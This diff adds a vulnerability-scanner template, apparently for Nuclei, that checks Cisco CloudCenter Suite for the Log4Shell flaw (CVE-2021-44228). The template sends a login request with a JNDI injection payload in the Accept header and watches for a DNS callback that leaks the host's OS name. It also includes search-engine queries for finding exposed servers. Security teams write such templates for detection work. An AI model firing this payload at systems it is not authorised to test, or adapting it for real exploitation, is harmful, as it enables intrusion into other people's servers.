diff --git a/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml new file mode 100644 index 0000000000..e200571b1d --- /dev/null +++ b/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml @@ -0,0 +1,59 @@ +id: cisco-cloudcenter-suite-log4j-rce + +info: + name: Cisco CloudCenter Suite - Remote Code Execution (Apache Log4j) + author: pwnhxl + severity: critical + description: | + Cisco CloudCenter Suite - Remote Code Execution. + reference: + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + shodan-query: title:"CloudCenter Suite" + fofa-query: title="CloudCenter Suite" + tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco + +requests: + - raw: + - | + @timeout: 10s + POST /suite-auth/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} + Content-Type: application/json + + {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + + - type: word + part: header + words: + - 'X-RateLimit-Limit-suite-gateway_suite-auth' + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output